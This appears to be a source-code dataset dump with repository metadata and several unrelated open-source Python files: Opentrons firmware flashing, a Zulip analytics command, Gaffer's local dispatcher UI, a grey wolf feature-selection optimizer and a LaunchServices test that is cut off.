border_color = NodeEnum.SELECTED_BORDER_COLOR.value
painter.setBrush(QtCore.Qt.NoBrush)
painter.setPen(QtGui.QPen(QtGui.QColor(*border_color), border))
painter.drawRoundedRect(rect, radius, radius)
painter.restore()
def get_nodes(self, inc_intersects=False):
mode = {True: QtCore.Qt.IntersectsItemShape,
False: QtCore.Qt.ContainsItemShape}
nodes = []
if self.scene():
polygon = self.mapToScene(self.boundingRect())
rect = polygon.boundingRect()
items = self.scene().items(rect, mode=mode[inc_intersects])
for item in items:
if item == self or item == self._sizer:
continue
if isinstance(item, AbstractNodeItem):
nodes.append(item)
return nodes
def calc_backdrop_size(self, nodes=None):
nodes = nodes or self.get_nodes(True)
if nodes:
nodes_rect = self._combined_rect(nodes)
else:
center = self.mapToScene(self.boundingRect().center())
nodes_rect = QtCore.QRectF(
center.x(), center.y(),
self._min_size[0], self._min_size[1]
)
padding = 40
return {
'pos': [
nodes_rect.x() - padding, nodes_rect.y() - padding
],
'width': nodes_rect.width() + (padding * 2),
'height': nodes_rect.height() + (padding * 2)
}
@property
def minimum_size(self):
return self._min_size
@minimum_size.setter
def minimum_size(self, size=(50, 50)):
self._min_size = size
@property
def backdrop_text(self):
return self._properties['backdrop_text']
@backdrop_text.setter
def backdrop_text(self, text):
self._properties['backdrop_text'] = text
self.update(self.boundingRect())
@AbstractNodeItem.width.setter
def width(self, width=0.0):
AbstractNodeItem.width.fset(self, width)
self._sizer.set_pos(self._width, self._height)
@AbstractNodeItem.height.setter
def height(self, height=0.0):
AbstractNodeItem.height.fset(self, height)
self._sizer.set_pos(self._width, self._height)
|
986c33f457a97f982b37be29151150a38bc9e56b
|
6fdb4eaf5b0e6dbd7db4bf947547541e9aebf110
|
/api/src/opentrons/hardware_control/modules/update.py
|
519bb9bbf2ad39aba270fafcf13ec97d44dd6cf6
|
[
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] |
permissive
|
Opentrons/opentrons
|
874321e01149184960eeaeaa31b1d21719a1ceda
|
026b523c8c9e5d45910c490efb89194d72595be9
|
refs/heads/edge
| 2023-09-02T02:51:49.579906
| 2023-08-31T16:02:45
| 2023-08-31T16:02:45
| 38,644,841
| 326
| 174
|
Apache-2.0
| 2023-09-14T21:47:20
| 2015-07-06T20:41:01
|
Python
|
UTF-8
|
Python
| false
| false
| 8,721
|
py
|
update.py
|
import asyncio
import logging
import os
from pathlib import Path
from glob import glob
from typing import Any, AsyncGenerator, Dict, Tuple, Optional, Union
from .types import UpdateError
from .mod_abc import AbstractModule
from opentrons.hardware_control.threaded_async_lock import ThreadedAsyncLock
from contextlib import asynccontextmanager
log = logging.getLogger(__name__)
_update_transition_lock = ThreadedAsyncLock()
@asynccontextmanager
async def protect_update_transition() -> AsyncGenerator[None, None]:
async with _update_transition_lock.lock():
yield
async def update_firmware(
module: AbstractModule,
firmware_file: Union[str, Path],
loop: Optional[asyncio.AbstractEventLoop],
) -> None:
"""Apply update of given firmware file to given module.
raises an UpdateError with the reason for the failure.
"""
async with protect_update_transition():
flash_port_or_dfu_serial = await module.prep_for_update()
kwargs: Dict[str, Any] = {
"stdout": asyncio.subprocess.PIPE,
"stderr": asyncio.subprocess.PIPE,
"loop": loop,
}
successful, res = await module.bootloader()(
flash_port_or_dfu_serial, str(firmware_file), kwargs
)
if not successful:
log.info(f"Bootloader reponse: {res}")
raise UpdateError(res)
async def find_bootloader_port() -> str:
"""
Finds the port of an Opentrons Module that has entered its bootloader.
The bootloader port shows up as 'ot_module_(avrdude|samba)_bootloader'
on the pi; return found port.
"""
for attempt in range(3):
bootloader_ports = glob("/dev/ot_module_*_bootloader*")
if bootloader_ports:
if len(bootloader_ports) == 1:
log.info(f"Found bootloader at port {bootloader_ports[0]}")
return bootloader_ports[0]
elif len(bootloader_ports) > 1:
raise OSError("Multiple new bootloader ports" "found on mode switch")
await asyncio.sleep(2)
raise Exception("No ot_module bootloaders found in /dev. Try again")
async def find_dfu_device(pid: str, expected_device_count: int) -> str:
"""
Find the dfu device and return its serial number (separate from module serial).
Args:
- pid: The USB Product ID of the device
- expected_device_count: The expected number of "devices" for dfu-util
to find for this PID. This is necessary because most STM32 MCU's
will enumerate with multiple DFU devices, representing the
separate programmable memory regions on the device. If more than
this many devices are found, it is assumed that either the wrong
module is in DFU mode *or* multiple modules are in DFU mode.
"""
retries = 5
log.info(f"Searching for a dfu device with PID {pid}")
while retries != 0:
retries -= 1
await asyncio.sleep(1)
proc = await asyncio.create_subprocess_exec(
"dfu-util",
"-l",
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
await proc.wait()
stdout, stderr = await proc.communicate()
if stdout is None and stderr is None:
continue
if stderr:
raise RuntimeError(f"Error finding dfu device: {stderr.decode()}")
result = stdout.decode()
if pid not in result:
# It could take a few seconds for the device to show up
continue
devices_found = 0
for line in result.splitlines():
if pid in line:
log.info(f"Found device with PID {pid}")
devices_found += 1
serial = line[(line.find("serial=") + 7) :]
if devices_found == expected_device_count:
# Heater-Shaker has 2 unique endpoints, Thermocycler has 3
return serial
elif devices_found > expected_device_count:
raise OSError("Multiple new bootloader devices" "found on mode switch")
raise RuntimeError(
"Could not update firmware via dfu. Possible issues- dfu-util"
" not working or specified dfu device not found"
)
async def upload_via_avrdude(
port: str, firmware_file_path: str, kwargs: Dict[str, Any]
) -> Tuple[bool, str]:
"""
Run firmware upload command for hardware module with avrdude bootloader.
Returns tuple of success boolean and message from bootloader.
"""
# avrdude_options
PART_NO = "atmega32u4"
PROGRAMMER_ID = "avr109"
BAUDRATE = "57600"
config_file_path = Path("/etc/avrdude.conf")
proc = await asyncio.create_subprocess_exec(
"avrdude",
"-C{}".format(config_file_path),
"-v",
"-p{}".format(PART_NO),
"-c{}".format(PROGRAMMER_ID),
"-P{}".format(port),
"-b{}".format(BAUDRATE),
"-D",
"-Uflash:w:{}:i".format(firmware_file_path),
**kwargs,
)
await proc.wait()
_result = await proc.communicate()
result = _result[1].decode()
avrdude_res = _format_avrdude_response(result)
if avrdude_res[0]:
log.debug(result)
else:
log.error(
"Failed to update module firmware for {}: {}".format(port, avrdude_res[1])
)
return avrdude_res
def _format_avrdude_response(raw_response: str) -> Tuple[bool, str]:
avrdude_log = ""
for line in raw_response.splitlines():
if "avrdude:" in line and line != raw_response.splitlines()[1]:
avrdude_log += line.lstrip("avrdude:") + ".."
if "flash verified" in line:
return True, line.lstrip("avrdude: ")
return False, avrdude_log
async def upload_via_bossa(
port: str, firmware_file_path: str, kwargs: Dict[str, Any]
) -> Tuple[bool, str]:
"""
Run firmware upload command for hardware module with SAMBA bootloader.
Returns tuple of success boolean and message from bootloader.
"""
# bossac -p/dev/ttyACM1 -e -w -v -R --offset=0x2000
# modules/thermo-cycler/production/firmware/thermo-cycler-arduino.ino.bin
# NOTE: bossac cannot traverse symlinks to port,
# so we resolve to real path
resolved_symlink = os.path.realpath(port)
log.info(
f"device at symlinked port: {port} " f"resolved to path: {resolved_symlink}"
)
bossa_args = [
"bossac",
f"-p{resolved_symlink}",
"-e",
"-w",
"-v",
"-R",
"--offset=0x2000",
f"{firmware_file_path}",
]
proc = await asyncio.create_subprocess_exec(*bossa_args, **kwargs)
stdout, stderr = await proc.communicate()
res = stdout.decode()
if "Verify successful" in res:
log.debug(res)
return True, res
elif stderr:
log.error(f"Failed to update module firmware for {port}: {res}")
log.error(f"Error given: {stderr.decode()}")
return False, res
return False, ""
async def upload_via_dfu(
dfu_serial: str, firmware_file_path: str, kwargs: Dict[str, Any]
) -> Tuple[bool, str]:
"""Run firmware upload command for DFU.
Unlike other firmware upload methods, this one doesn't take a `port` argument since
the module isn't recognized as a cdc device in dfu mode and hence doesn't get
a port. The firmware upload utility, dfu-util, looks for the specific module
by searching for available dfu devices. Since we check beforehand that only one
dfu device is available during the upload process, this check is sufficient for us.
In the future, if we want to make sure that the dfu device available is in fact
the one we seek, then we can ask dfu-util to check for available dfu devices with
a specific serial number (unrelated to Opentrons' module serial numbers).
Hence, this method takes a `dfu_serial` argument instead.
Returns tuple of success boolean and message from bootloader
"""
log.info("Starting firmware upload via dfu util")
dfu_args = [
"dfu-util",
"-a 0",
"-s 0x08000000:leave",
f"-D{firmware_file_path}",
"-R",
]
proc = await asyncio.create_subprocess_exec(*dfu_args, **kwargs)
stdout, stderr = await proc.communicate()
res = stdout.decode()
if "File downloaded successfully" in res:
log.debug(res)
log.info("Firmware upload successful")
return True, res
else:
log.error(
f"Failed to update module firmware for {dfu_serial}. "
# It isn't easy to decipher the issue from stderror alone
f"stdout: {res} \n"
f"stderr: {stderr.decode()}"
)
return False, res
|
c761b8a065780e52a4f61534dab4afb3b7d2f13d
|
952dc66c61966f099756cdb6c2d13b40352f63cc
|
/analytics/management/commands/clear_single_stat.py
|
f0b8f0ff4e5ee2f718db652387b379fbc8b77789
|
[
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
zulip/zulip
|
5ae6aad35fd9f72996c0a2a9cdd674400966ebf6
|
965a25d91b6ee2db54038f5df855215fa25146b0
|
refs/heads/main
| 2023-08-28T23:43:00.971110
| 2023-08-28T16:47:09
| 2023-08-28T19:33:02
| 43,160,685
| 20,239
| 8,996
|
Apache-2.0
| 2023-09-14T20:57:47
| 2015-09-25T16:37:25
|
Python
|
UTF-8
|
Python
| false
| false
| 838
|
py
|
clear_single_stat.py
|
from argparse import ArgumentParser
from typing import Any
from django.core.management.base import BaseCommand, CommandError
from analytics.lib.counts import COUNT_STATS, do_drop_single_stat
class Command(BaseCommand):
help = """Clear analytics tables."""
def add_arguments(self, parser: ArgumentParser) -> None:
parser.add_argument("--force", action="store_true", help="Actually do it.")
parser.add_argument("--property", help="The property of the stat to be cleared.")
def handle(self, *args: Any, **options: Any) -> None:
property = options["property"]
if property not in COUNT_STATS:
raise CommandError(f"Invalid property: {property}")
if not options["force"]:
raise CommandError("No action taken. Use --force.")
do_drop_single_stat(property)
|
27d875b6ed019b7215d9196dd30ab68e519996cb
|
6146e33102797407ede06ce2daa56c28fdfa2812
|
/python/GafferDispatchUI/LocalDispatcherUI.py
|
a7110218ad531b82e7d3f84e624c4c7b4734ea91
|
[
"BSD-3-Clause"
] |
permissive
|
GafferHQ/gaffer
|
e1eb78ba8682bfbb7b17586d6e7b47988c3b7d64
|
59cab96598c59b90bee6d3fc1806492a5c03b4f1
|
refs/heads/main
| 2023-09-01T17:36:45.227956
| 2023-08-30T09:10:56
| 2023-08-30T09:10:56
| 9,043,124
| 707
| 144
|
BSD-3-Clause
| 2023-09-14T09:05:37
| 2013-03-27T00:04:53
|
Python
|
UTF-8
|
Python
| false
| false
| 12,027
|
py
|
LocalDispatcherUI.py
|
##########################################################################
#
# Copyright (c) 2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import weakref
import Gaffer
import GafferUI
import GafferDispatch
from Qt import QtCore
from Qt import QtGui
Gaffer.Metadata.registerNode(
GafferDispatch.LocalDispatcher,
"description",
"""
Schedules execution of task graphs on the local machine. Tasks
may be dispatched in the background to keep the UI responsive.
""",
plugs = {
"executeInBackground" : (
"description",
"""
Executes the dispatched tasks in separate processes via a
background thread.
""",
),
"ignoreScriptLoadErrors" : (
"description",
"""
Ignores errors loading the script when executing in the background.
This is not recommended - fix the problem instead.
""",
),
"environmentCommand" : (
"description",
"""
Optional system command to modify the environment when launching
tasks in the background. Background tasks are launched in a separate
process using a `gaffer execute ...` command, and they inherit the
environment from the launching process. When an environment
command is specified, tasks are instead launched using `environmentCommand
gaffer execute ...`, and the environment command is responsible for
modifying the inherited environment and then launching `gaffer execute ...`.
For example, the following environment command will use the standard `/usr/bin/env`
program to set some custom variables :
```
/usr/bin/env FOO=BAR TOTO=TATA
```
"""
),
}
)
##########################################################################
# Public functions
##########################################################################
def appendMenuDefinitions( menuDefinition, prefix="" ) :
menuDefinition.append( prefix + "/View Local Jobs", { "command" : __showLocalDispatcherWindow } )
##################################################################################
# Dispatcher Window
##################################################################################
class _LocalJobsPath( Gaffer.Path ) :
def __init__( self, jobPool, job = None, path = None, root = "/" ) :
Gaffer.Path.__init__( self, path = path, root = root )
self.__jobPool = jobPool
self.__job = job
def copy( self ) :
c = self.__class__( self.__jobPool, self.__job )
return c
def propertyNames( self, canceller = None ) :
return Gaffer.Path.propertyNames() + [
"localDispatcher:status",
"localDispatcher:id",
"localDispatcher:jobName",
"localDispatcher:directory",
"localDispatcher:cpu",
"localDispatcher:memory",
]
def property( self, name, canceller = None ) :
result = Gaffer.Path.property( self, name )
if result is not None :
return result
if self.__job is None :
return None
if name == "localDispatcher:status" :
if self.__job.failed() :
return "Failed"
elif self.__job.killed() :
return "Killed"
else :
return "Running"
elif name == "localDispatcher:id" :
return self.__job.id()
elif name == "localDispatcher:jobName" :
return self.__job.name()
elif name == "localDispatcher:directory" :
return self.__job.directory()
elif name == "localDispatcher:cpu" :
stats = self.__job.statistics()
return "{0:.2f} %".format( stats["pcpu"] ) if "pcpu" in stats.keys() else "N/A"
elif name == "localDispatcher:memory" :
stats = self.__job.statistics()
return "{0:.2f} GB".format( stats["rss"] / 1024.0 / 1024.0 ) if "rss" in stats.keys() else "N/A"
return None
def job( self ) :
return self.__job
def jobPool( self ) :
return self.__jobPool
def isLeaf( self, canceller = None ) :
return len( self )
def _children( self, canceller ) :
if self.isLeaf() :
return []
result = []
jobs = self.__jobPool.jobs() + self.__jobPool.failedJobs()
for job in jobs :
result.append(
_LocalJobsPath(
jobPool = self.__jobPool,
job = job,
path = [ str(jobs.index(job)) ],
)
)
return result
class _LocalJobsWindow( GafferUI.Window ) :
def __init__( self, jobPool, **kw ) :
GafferUI.Window.__init__( self, **kw )
with self :
with GafferUI.SplitContainer( borderWidth = 8 ) :
self.__jobListingWidget = GafferUI.PathListingWidget(
_LocalJobsPath( jobPool ),
columns = (
GafferUI.PathListingWidget.IconColumn( "Status", "localDispatcherStatus", "localDispatcher:status" ),
GafferUI.PathListingWidget.StandardColumn( "Name", "localDispatcher:jobName", sizeMode = GafferUI.PathColumn.SizeMode.Stretch ),
GafferUI.PathListingWidget.StandardColumn( "Id", "localDispatcher:id" ),
GafferUI.PathListingWidget.StandardColumn( "CPU", "localDispatcher:cpu" ),
GafferUI.PathListingWidget.StandardColumn( "Memory", "localDispatcher:memory" ),
),
selectionMode = GafferUI.PathListingWidget.SelectionMode.Rows,
)
self.__jobListingWidget._qtWidget().header().setSortIndicator( 1, QtCore.Qt.AscendingOrder )
self.__jobListingWidget.selectionChangedSignal().connect( Gaffer.WeakMethod( self.__jobSelectionChanged ), scoped = False )
with GafferUI.TabbedContainer() as self.__tabs :
with GafferUI.ScrolledContainer( parenting = { "label" : "Details" } ) as self.__detailsTab :
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Vertical, spacing=10, borderWidth=10 ) :
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing=15 ) :
GafferUI.Label( "<h3>Current Batch</h3>" )
self.__detailsCurrentDescription = GafferUI.Label( "N/A" )
self.__detailsCurrentDescription.setTextSelectable( True )
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing=15 ) :
GafferUI.Label( "<h3>Directory</h3>" )
self.__detailsDirectory = GafferUI.Label( "N/A" )
self.__detailsDirectory.setTextSelectable( True )
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Vertical, spacing=10, borderWidth=10, parenting = { "label" : "Messages" } ) as self.__messagesTab :
self.__messageWidget = GafferUI.MessageWidget( toolbars = True, follow = True )
self.__messageWidget._qtWidget().setMinimumHeight( 150 )
self.__tabs.currentChangedSignal().connect( Gaffer.WeakMethod( self.__tabChanged ), scoped = False )
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing=5 ) :
self.__killButton = GafferUI.Button( "Kill Selected Jobs" )
self.__killButton.setEnabled( False )
self.__killButton.clickedSignal().connect( Gaffer.WeakMethod( self.__killClicked ), scoped = False )
self.__removeButton = GafferUI.Button( "Remove Failed Jobs" )
self.__removeButton.setEnabled( False )
self.__removeButton.clickedSignal().connect( Gaffer.WeakMethod( self.__removeClicked ), scoped = False )
self.setTitle( "Local Dispatcher Jobs" )
self.__updateTimer = QtCore.QTimer()
self.__updateTimer.timeout.connect( Gaffer.WeakMethod( self.__update ) )
self.visibilityChangedSignal().connect( Gaffer.WeakMethod( self.__visibilityChanged ), scoped = False )
jobPool.jobAddedSignal().connect( Gaffer.WeakMethod( self.__jobAdded ), scoped = False )
jobPool.jobRemovedSignal().connect( Gaffer.WeakMethod( self.__jobRemoved ), scoped = False )
## Acquires the LocalJobsWindow for the specified application.
@staticmethod
def acquire( jobPool ) :
assert( isinstance( jobPool, GafferDispatch.LocalDispatcher.JobPool ) )
window = getattr( jobPool, "_window", None )
if window is not None and window() :
return window()
window = _LocalJobsWindow( jobPool )
jobPool._window = weakref.ref( window )
return window
def __visibilityChanged( self, widget ) :
if widget.visible() :
self.__updateTimer.start( 5000 )
else :
self.__updateTimer.stop()
def __jobAdded( self, job ) :
GafferUI.EventLoop.executeOnUIThread( self.__update )
def __jobRemoved( self, job ) :
GafferUI.EventLoop.executeOnUIThread( self.__update )
def __update( self ) :
self.__jobListingWidget.getPath()._emitPathChanged()
def __updateDetails( self ) :
jobs = self.__selectedJobs()
if len( jobs ) != 1 :
self.__detailsCurrentDescription.setText( "N/A" )
self.__detailsDirectory.setText( "N/A" )
return
self.__detailsCurrentDescription.setText( jobs[0].description() )
self.__detailsDirectory.setText( jobs[0].directory() )
def __updateMessages( self ) :
self.__messageWidget.clear()
jobs = self.__selectedJobs()
if len( jobs ) != 1 :
return
for m in jobs[0].messageHandler().messages :
self.__messageWidget.messageHandler().handle( m.level, m.context, m.message )
def __killClicked( self, button ) :
for job in self.__selectedJobs() :
job.kill()
self.__update()
def __removeClicked( self, button ) :
jobPool = self.__jobListingWidget.getPath().jobPool()
for job in self.__selectedJobs() :
if job.failed() :
jobPool._remove( job, force = True )
self.__update()
def __selectedJobs( self ) :
rootPath = self.__jobListingWidget.getPath()
selection = self.__jobListingWidget.getSelection()
return [
path.job() for path in rootPath.children()
if selection.match( str( path ) ) & selection.Result.ExactMatch
]
def __jobSelectionChanged( self, widget ) :
jobs = self.__selectedJobs()
numFailed = len( [ job for job in jobs if job.failed() ] )
self.__removeButton.setEnabled( numFailed )
self.__killButton.setEnabled( len( jobs ) - numFailed > 0 )
currentTab = self.__tabs.getCurrent()
if currentTab is self.__detailsTab :
self.__updateDetails()
elif currentTab is self.__messagesTab :
self.__updateMessages()
def __tabChanged( self, tabs, currentTab ) :
if currentTab is self.__detailsTab :
self.__updateDetails()
elif currentTab is self.__messagesTab :
self.__updateMessages()
##########################################################################
# Implementation Details
##########################################################################
def __showLocalDispatcherWindow( menu ) :
window = _LocalJobsWindow.acquire( GafferDispatch.LocalDispatcher.defaultJobPool() )
scriptWindow = menu.ancestor( GafferUI.ScriptWindow )
scriptWindow.addChildWindow( window )
window.setVisible( True )
|
63ab4a09f51adf99971ef00be0b8c5b931be53d6
|
e4b7980aa0deb74a4b3a42a124ca9fe85067a03c
|
/zoofs/greywolfoptimization.py
|
e805518ac5b38292ee6b42c2b4989d3eb79f55bf
|
[
"Apache-2.0"
] |
permissive
|
jaswinder9051998/zoofs
|
2b1238a901f0e711e354214dea968fb79da17bc0
|
7c502b88818dcdf82387d617d6dcf8b9447c2dc5
|
refs/heads/master
| 2023-09-02T07:47:24.988182
| 2023-02-09T14:51:16
| 2023-02-09T14:51:16
| 278,821,412
| 208
| 42
|
Apache-2.0
| 2023-08-29T15:09:46
| 2020-07-11T08:33:37
|
Python
|
UTF-8
|
Python
| false
| false
| 8,880
|
py
|
greywolfoptimization.py
|
from zoofs.baseoptimizationalgorithm import BaseOptimizationAlgorithm
import numpy as np
import time
import warnings
class GreyWolfOptimization(BaseOptimizationAlgorithm):
def __init__(
self,
objective_function,
n_iteration: int = 1000,
timeout: int = None,
population_size=50,
method=1,
minimize=True,
logger=None,
**kwargs,
):
"""
Parameters
----------
objective_function : user made function of the signature 'func(model,X_train,y_train,X_test,y_test)'
The function must return a value, that needs to be minimized/maximized.
n_iteration : int, default=1000
Number of time the Optimization algorithm will run
timeout: int = None
Stop operation after the given number of second(s).
If argument is set to None, the operation is executed without time limitation and n_iteration is followed
population_size : int, default=50
Total size of the population
method : {1, 2}, default=1
Choose the between the two methods of grey wolf optimization
minimize : bool, default=True
Defines if the objective value is to be maximized or minimized
logger: Logger or None, optional (default=None)
- accepts `logging.Logger` instance.
**kwargs
Any extra keyword argument for objective_function
Attributes
----------
best_feature_list : ndarray of shape (n_features)
list of features with the best result of the entire run
"""
super().__init__(
objective_function, n_iteration, timeout, population_size, minimize, logger, **kwargs
)
self.method = method
def _check_params(self, model, x_train, y_train, x_valid, y_valid, method=1):
super()._check_params(model, x_train, y_train, x_valid, y_valid)
if method not in [1, 2]:
raise ValueError("method accepts only 1,2 ")
def fit(self, model, X_train, y_train, X_valid, y_valid, verbose=True):
"""
Parameters
----------
model : machine learning model's object
machine learning model's object
X_train : pandas.core.frame.DataFrame of shape (n_samples, n_features)
Training input samples to be used for machine learning model
y_train : pandas.core.frame.DataFrame or pandas.core.series.Series of shape (n_samples)
The target values (class labels in classification, real numbers in regression).
X_valid : pandas.core.frame.DataFrame of shape (n_samples, n_features)
Validation input samples
y_valid : pandas.core.frame.DataFrame or pandas.core.series.Series of shape (n_samples)
The target values (class labels in classification, real numbers in regression).
verbose : bool,default=True
Print results for iterations
"""
self._check_params(model, X_train, y_train, X_valid, y_valid, self.method)
self.feature_score_hash = {}
self.feature_list = np.array(list(X_train.columns))
self.best_results_per_iteration = {}
self.best_score = np.inf
self.best_dim = np.ones(X_train.shape[1])
self.initialize_population(X_train)
self.best_score_dimension = np.ones(X_train.shape[1])
self.alpha_wolf_dimension, self.alpha_wolf_fitness = np.ones(X_train.shape[1]), np.inf
self.beta_wolf_dimension, self.beta_wolf_fitness = np.ones(X_train.shape[1]), np.inf
self.delta_wolf_dimension, self.delta_wolf_fitness = np.ones(X_train.shape[1]), np.inf
if self.timeout is not None:
timeout_upper_limit = time.time() + self.timeout
else:
timeout_upper_limit = time.time()
for i in range(self.n_iteration):
if (self.timeout is not None) & (time.time() > timeout_upper_limit):
warnings.warn("Timeout occured")
break
a = 2 - 2 * ((i + 1) / self.n_iteration)
self.fitness_scores = self._evaluate_fitness(model, X_train, y_train, X_valid, y_valid)
self.iteration_objective_score_monitor(i)
top_three_fitness_indexes = np.argsort(self.fitness_scores)[:3]
for fit, dim in zip(
np.array(self.fitness_scores)[top_three_fitness_indexes],
self.individuals[top_three_fitness_indexes],
):
if fit < self.alpha_wolf_fitness:
self.delta_wolf_fitness = self.beta_wolf_fitness
self.beta_wolf_fitness = self.alpha_wolf_fitness
self.alpha_wolf_fitness = fit
self.delta_wolf_dimension = self.beta_wolf_dimension
self.beta_wolf_dimension = self.alpha_wolf_dimension
self.alpha_wolf_dimension = dim
continue
if (fit > self.alpha_wolf_fitness) & (fit < self.beta_wolf_fitness):
self.delta_wolf_fitness = self.beta_wolf_fitness
self.beta_wolf_fitness = fit
self.delta_wolf_dimension = self.beta_wolf_dimension
self.beta_wolf_dimension = dim
continue
if (fit > self.beta_wolf_fitness) & (fit < self.delta_wolf_fitness):
self.delta_wolf_fitness = fit
self.delta_wolf_dimension = dim
if (self.method == 1) | (self.method == 2):
C1 = 2 * np.random.random((self.population_size, X_train.shape[1]))
A1 = 2 * a * np.random.random((self.population_size, X_train.shape[1])) - a
d_alpha = abs(C1 * self.alpha_wolf_dimension - self.individuals)
C2 = 2 * np.random.random((self.population_size, X_train.shape[1]))
A2 = 2 * a * np.random.random((self.population_size, X_train.shape[1])) - a
d_beta = abs(C2 * self.beta_wolf_dimension - self.individuals)
C3 = 2 * np.random.random((self.population_size, X_train.shape[1]))
A3 = 2 * a * np.random.random((self.population_size, X_train.shape[1])) - a
d_delta = abs(C3 * self.delta_wolf_dimension - self.individuals)
if self.method == 2:
X1 = abs(self.alpha_wolf_dimension - A1 * d_alpha)
X2 = abs(self.beta_wolf_dimension - A2 * d_beta)
X3 = abs(self.delta_wolf_dimension - A3 * d_delta)
self.individuals = np.where(
np.random.uniform(size=(self.population_size, X_train.shape[1]))
<= self.sigmoid((X1 + X2 + X3) / 3),
1,
0,
)
if self.method == 1:
Y1 = np.where(
(
self.alpha_wolf_dimension
+ np.where(
self.sigmoid(A1 * d_alpha)
> np.random.uniform(size=(self.population_size, X_train.shape[1])),
1,
0,
)
)
>= 1,
1,
0,
)
Y2 = np.where(
(
self.beta_wolf_dimension
+ np.where(
self.sigmoid(A1 * d_beta)
> np.random.uniform(size=(self.population_size, X_train.shape[1])),
1,
0,
)
)
>= 1,
1,
0,
)
Y3 = np.where(
(
self.delta_wolf_dimension
+ np.where(
self.sigmoid(A1 * d_delta)
> np.random.uniform(size=(self.population_size, X_train.shape[1])),
1,
0,
)
)
>= 1,
1,
0,
)
r = np.random.uniform(size=(self.population_size, X_train.shape[1]))
self.individuals[r < (1 / 3)] = Y1[r < (1 / 3)]
self.individuals[(r >= (1 / 3)) & (r < (2 / 3))] = Y2[
(r >= (1 / 3)) & (r < (2 / 3))
]
self.individuals[r >= (2 / 3)] = Y3[r >= (2 / 3)]
self.verbose_results(verbose, i)
self.best_feature_list = list(self.feature_list[np.where(self.best_dim)[0]])
return self.best_feature_list
|
ecbd943c92bf3361a98b8edea53e221a4d0e7247
|
f80ef3a3cf859b13e8af8433af549b6b1043bf6e
|
/pyobjc-framework-LaunchServices/PyObjCTest/test_lsinfo.py
|
0fcd2db61b4eaa4eb136a74ae2f9457997b0cebb
|
[
"MIT"
] |
permissive
|
ronaldoussoren/pyobjc
|
29dc9ca0af838a56105a9ddd62fb38ec415f0b86
|
77b98382e52818690449111cd2e23cd469b53cf5
|
refs/heads/master
| 2023-09-01T05:15:21.814504
| 2023-06-13T20:00:17
| 2023-06-13T20:00:17
| 243,933,900
| 439
| 49
| null | 2023-06-25T02:49:07
| 2020-02-29T08:43:12
|
Python
|
UTF-8
|
Python
| false
| false
| 17,085
|
py
|
test_lsinfo.py
|
import os
import warnings
from PyObjCTools.TestSupport import TestCase, min_os_level, os_release, os_level_key
import objc
with warnings.catch_warnings():
warnings.filterwarnings("ignore")
import LaunchServices
class TestLSInfo(TestCase):
def setUp(self):
self.path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "dummy.txt"
)
fp = open(self.path, "w")
fp.write("test contents")
fp.close()
self.bpath = self.path.encode("utf-8")
def tearDown(self):
if os.path.exists(self.path):
os.unlink(self.path)
def testConstants(self):
self.assertEqual(LaunchServices.kLSInvalidExtensionIndex, 0xFFFFFFFFFFFFFFFF)
self.assertEqual(LaunchServices.kLSAppInTrashErr, -10660)
self.assertEqual(LaunchServices.kLSExecutableIncorrectFormat, -10661)
self.assertEqual(LaunchServices.kLSAttributeNotFoundErr, -10662)
self.assertEqual(LaunchServices.kLSAttributeNotSettableErr, -10663)
self.assertEqual(LaunchServices.kLSIncompatibleApplicationVersionErr, -10664)
self.assertEqual(LaunchServices.kLSNoRosettaEnvironmentErr, -10665)
self.assertEqual(LaunchServices.kLSUnknownErr, -10810)
self.assertEqual(LaunchServices.kLSNotAnApplicationErr, -10811)
self.assertEqual(LaunchServices.kLSNotInitializedErr, -10812)
self.assertEqual(LaunchServices.kLSDataUnavailableErr, -10813)
self.assertEqual(LaunchServices.kLSApplicationNotFoundErr, -10814)
self.assertEqual(LaunchServices.kLSUnknownTypeErr, -10815)
self.assertEqual(LaunchServices.kLSDataTooOldErr, -10816)
self.assertEqual(LaunchServices.kLSDataErr, -10817)
self.assertEqual(LaunchServices.kLSLaunchInProgressErr, -10818)
self.assertEqual(LaunchServices.kLSNotRegisteredErr, -10819)
self.assertEqual(LaunchServices.kLSAppDoesNotClaimTypeErr, -10820)
self.assertEqual(LaunchServices.kLSAppDoesNotSupportSchemeWarning, -10821)
self.assertEqual(LaunchServices.kLSServerCommunicationErr, -10822)
self.assertEqual(LaunchServices.kLSCannotSetInfoErr, -10823)
self.assertEqual(LaunchServices.kLSNoRegistrationInfoErr, -10824)
self.assertEqual(LaunchServices.kLSIncompatibleSystemVersionErr, -10825)
